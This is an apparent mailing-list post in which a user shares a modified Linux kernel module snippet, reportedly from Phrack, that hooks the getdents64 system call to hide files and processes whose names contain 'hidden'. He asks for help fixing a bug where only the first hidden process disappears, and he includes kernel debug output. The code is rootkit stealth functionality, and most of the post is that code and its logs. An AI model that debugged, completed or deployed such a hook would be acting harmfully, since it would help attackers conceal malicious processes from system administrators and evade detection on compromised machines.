Here's a little modify (just a bit) snipplet from phreak about
how to hide files and process. Canany one answer me why
does it exit after it finds the first hidden process, and don't go
on to hide the second hidden porcess?
Thanks,
Guy
<+++>
char hidden[] = "hidden";
[...]
int n_getdents64(unsigned int fd, struct dirent64 *dirp, unsigned int count)
{
unsigned int tmp, n;
int t, proc=0;
struct inode *dinode;
struct dirent64 *dirp2, *dirp3;
tmp = (*orig_getdents64) (fd, dirp, count);
dinode = current->files->fd[fd]->f_dentry->d_inode;
if( dinode->i_ino == PROC_ROOT_INO && !MAJOR(dinode->i_dev) &&
MINOR(dinode->i_dev) == 2)
proc = 1;
/*dinode is the inode of the required directory*/
if (tmp > 0)
{
/*dirp2 is a new dirent structure*/
dirp2 = (struct dirent64 *) kmalloc(tmp, GFP_KERNEL);
/*copy original dirent structure to dirp2*/
copy_from_user(dirp2, dirp, tmp);
/*dirp3 points to dirp2*/
dirp3 = dirp2;
t = tmp;
while (t > 0)
{
n = dirp3->d_reclen;
t -= n;
/*check if current filename is the name of the file we want to hide*/
/* or pid */
if ( (strstr((char *) &(dirp3->d_name), (char *) &hidden) != NULL) ||
(proc && invisible(myatoi(dirp3->d_name))))
{
/*modify dirent struct if necessary*/
if (t != 0)
memmove(dirp3, (char *) dirp3 + dirp3->d_reclen, t);
else
dirp3->d_off = 1024;
tmp -= n;
}
if (t != 0)
dirp3 = (struct dirent64 *) ((char *) dirp3 + dirp3->d_reclen);
}
copy_to_user(dirp, dirp2, tmp);
kfree(dirp2);
}
return tmp;
}
<--->
If you want to see a little KERN_DEBUG:
ps was run after
/hiddensleep &
/hiddensleep2 &
[...]
Aug 29 14:40:22 arpo kernel: IS IT?: hiddensleep
Aug 29 14:40:22 arpo kernel: GOT IT, IT'S: hiddensleep
Aug 29 14:40:22 arpo kernel: tmp = 456, t = 48, n = 24
Aug 29 14:40:22 arpo kernel: IS IT?: ps
Aug 29 14:40:22 arpo kernel: IS IT?: ps
Aug 29 14:40:22 arpo kernel: IS IT?: less
Aug 29 14:40:22 arpo kernel: +++
Aug 29 14:40:22 arpo kernel: dinode->i_ino(1) == 1
Aug 29 14:40:22 arpo kernel: !MAJOR(dinode->i_dev) == 1
Aug 29 14:40:23 arpo kernel: MINOR(dinode->i_dev) == 2
Aug 29 14:40:23 arpo kernel: tmp = 0
[end]
BTW: I know some of you prolly wrote a better module that does this
and even more.. I'm not interesting in getting its source (it's just too easy),
I want to keep working on mine.
Cheers
--
Unix Administration, | http://www.unixadmin.co.il
locally and remotely. | [EMAIL PROTECTED]
Planning, installation, | Phone: 972-3-6201373
support & upgrades. | Location: Unrestricted
=================================================================
To unsubscribe, send mail to [EMAIL PROTECTED] with
the word "unsubscribe" in the message body, e.g., run the command
echo unsubscribe | mail [EMAIL PROTECTED]
